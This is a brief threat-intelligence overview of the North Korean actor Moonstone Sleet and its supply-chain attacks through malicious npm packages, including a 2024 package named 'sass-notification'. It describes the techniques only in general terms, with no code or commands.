Moonstone Sleet

Moonstone Sleet, a state-sponsored threat actor originating from North Korea, has emerged as a significant cybersecurity concern. The group is involved in the publication of malicious npm and other code packages to popular developer repositories, a tactic that's becoming an increasingly common security epidemic. By poisoning code across the software supply chain, Moonstone Sleet and similar threat actors are able to achieve broad attack surfaces with minimal effort. This method allows them to infiltrate systems undetected, leaving what appears to be harmless software behind while executing remote payloads. Microsoft publicly recognized Moonstone Sleet's activities on May 28, 2024, in a blog post titled "Moonstone Sleet emerges as new North Korean threat actor with new bag of tricks," partially revealing their findings about the group's tactics. Other notable threat actors identified by Microsoft include Peach Sandstorm, Mint Sandstorm, Mabna Institute, Emerald Sleet, and the developing Storm-1877. These entities, like Moonstone Sleet, pose significant threats to digital security worldwide due to their sophisticated and evolving methods of attack. The most recent activity linked to Moonstone Sleet was the publication of a package called "sass-notification" on August 27, 2024. This package uses obfuscated JavaScript to run scripts that download, decrypt, and execute remote payloads, subsequently removing traces of malicious activity. The widespread distribution and stealthy nature of these attacks underscore the critical need for heightened vigilance and robust cybersecurity measures across all sectors.